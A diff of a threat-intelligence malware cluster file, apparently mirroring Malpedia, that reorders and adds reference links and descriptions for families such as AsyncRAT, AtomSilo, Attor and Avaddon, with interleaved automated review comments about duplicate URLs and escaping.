"https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique", + "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", + 
"https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader", + "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.esentire.com/blog/asyncrat-activity", + "https://blog.morphisec.com/syk-crypter-discord", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#", "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://community.riskiq.com/article/24759ad2", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware", - "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html", + 
"https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection", + "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html", "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://community.riskiq.com/article/3929ede0/description", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", + 
"https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser", + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat", + "https://labs.k7computing.com/?p=21759", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://community.riskiq.com/article/ade260c6", + "https://aidenmitchell.ca/asyncrat-via-vbs/", + "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight", + "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html", "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/", - "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", - "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia", - "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#", - 
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies", - "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/", - "https://twitter.com/MsftSecIntel/status/1392219299696152578", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader", - "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", - "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", - "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat", - "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://labs.k7computing.com/?p=21759", - "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", - 
"https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", - "https://blog.netlab.360.com/purecrypter", - "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", - "https://twitter.com/vxunderground/status/1519632014361640960", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/", "https://twitter.com/ESETresearch/status/1449132020613922828", - "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html", - "https://www.esentire.com/blog/asyncrat-activity", - "https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight", - "https://eln0ty.github.io/malware%20analysis/asyncRAT/", - 
"https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper", - "https://aidenmitchell.ca/asyncrat-via-vbs/", - "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", - "https://community.riskiq.com/article/3929ede0/description", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://embee-research.ghost.io/shodan-censys-queries/", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", - "https://community.riskiq.com/article/ade260c6", - "https://blog.morphisec.com/syk-crypter-discord", - "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", - 
"https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies", + "https://twitter.com/vxunderground/status/1519632014361640960", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html", + "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign", + "https://community.riskiq.com/article/24759ad2", + "https://mssplab.github.io/threat-hunting/2023/05/19/malware-src-asyncrat.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf", "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", - "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html", - "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", - "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader", - "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser", - "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/" + "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", + 
"https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://blog.netlab.360.com/purecrypter", + "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat", + "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", + "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", + "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://eln0ty.github.io/malware%20analysis/asyncRAT/", + "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html" ], "synonyms": [], "type": [] @@ -13618,8 +14250,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [], @@ -13647,10 +14279,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [], "type": [] 
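Review bot: The AsyncRAT `refs` array on the new side keeps `https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia` and the same URL with a trailing slash as two separate entries, so the list still contains a duplicate that only differs by a `/`; trimming trailing slashes before de-duplicating in the generator would drop one of them (the same pair pattern appears in other entries in this patch). The only change to the description is `’` being re-emitted as `\u2019`, which is a serializer escaping choice, not a content change, and it adds noise to an already ~90-line hunk; the old literal UTF-8 form is the more interoperable one under RFC 8259 and would keep future diffs to real edits. The remaining lines of the hunk are a reorder plus genuine additions.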
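Review bot: The ATMSpitter hunk's new side lists both `http://www.secureworks.com/research/threat-profiles/gold-kingswood` and its `https://` twin, so the entry carries a duplicate reference and one of the two is a plaintext-HTTP link to the same page. Dropping the `http://` variant, or normalising the scheme before de-duplicating in the generator, would leave one canonical reference. The hunk is otherwise a pure reorder of existing refs.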
@@ -13659,19 +14291,19 @@ "value": "ATMSpitter" }, { - "description": "", + "description": "According to PCrisk, AtomSilo is a type of malware that blocks access to files by encrypting them and renames every encrypted file by appending the \".ATOMSILO\" to its filename. It renames \"1.jpg\" to \"1.jpg.ATOMSILO\", \"2.jpg\" to \"2.jpg.ATOMSILO\", and so on. As its ransom note, AtomSilo creates the \"README-FILE-#COMPUTER-NAME#-#CREATION-TIME#.hta\" file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo", + "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://twitter.com/siri_urz/status/1437664046556274694?s=20", "https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/", "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion", - "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/", - "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://twitter.com/siri_urz/status/1437664046556274694?s=20" + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/" ], "synonyms": [], "type": [] 
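Review bot: The AtomSilo `refs` array on the new side still contains `https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/` next to the same path with a single slash, so the reorder leaves a duplicate that differs only by a doubled `/`; collapsing repeated path separators before de-duplicating, or simply dropping the `//` entry, would fix it. The replacement description is credited to PCrisk and the quoted ransom-note pattern `README-FILE-#COMPUTER-NAME#-#CREATION-TIME#.hta` looks directly usable as a hunting artifact, which is a real improvement over the empty string it replaces.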
@@ -13680,19 +14312,19 @@ "value": "ATOMSILO" }, { - "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", + "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. 
\r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", - "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", - "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", - "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami", - "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/", - "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/" + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", + "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", + "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", + 
"https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", + "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami" ], "synonyms": [], "type": [] @@ -13749,11 +14381,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/", - "https://twitter.com/malwrhunterteam/status/1001461507513880576", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.morphisec.com/in2al5d-p3in4er" + "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/", + "https://blog.morphisec.com/in2al5d-p3in4er", + "https://twitter.com/malwrhunterteam/status/1001461507513880576", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "OneKeyLocker" 
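Review bot: The Attor `refs` on the new side keep `https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform` and the same URL with a trailing slash as two entries, so the list still has a duplicate the reorder did not touch; normalising trailing slashes before de-duplicating would remove it here and in the similar pairs elsewhere in the file. The description diff is only the `’` → `\u2019` re-escaping, with no wording change. The Aurora ransomware hunk that shares this line is a pure reorder.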
@@ -13768,13 +14400,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer", - "https://d01a.github.io/aurora-stealer/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/", "https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html", - "https://d01a.github.io/aurora-stealer-builder/", - "https://isc.sans.edu/diary/rss/29448", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer", + "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/", + "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219", + "https://d01a.github.io/aurora-stealer/", "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/", - "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/" + "https://d01a.github.io/aurora-stealer-builder/", + "https://isc.sans.edu/diary/rss/29448" ], "synonyms": [], "type": [] 
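Review bot: Among the refs added to the Aurora Stealer entry, `https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219` is titled around the AMOS infostealer rather than Aurora, so it is worth confirming the article actually discusses `win.aurora_stealer` before it is published as a reference for it; if it does not, the fix belongs upstream in Malpedia since this cluster mirrors it. The other two additions (Spamhaus Q2 2023 report, eSentire analysis) read as on-topic, and the rest of the hunk is a reorder of existing links.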
@@ -13787,45 +14422,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.connectwise.com/resources/avaddon-profile", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://twitter.com/Securityinbits/status/1271065316903120902", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", - "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/", - "https://twitter.com/dk_samper/status/1348560784285167617", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.swascan.com/it/avaddon-ransomware/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + 
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis", "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/", + "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/", + "https://twitter.com/dk_samper/status/1348560784285167617", + "https://www.connectwise.com/resources/avaddon-profile", + "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://arxiv.org/pdf/2102.04796.pdf", - "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", - "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", - "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/", - "https://www.tgsoft.it/files/report/download.asp?id=568531345", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + 
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis", - "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf", "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", - "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf" + "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + 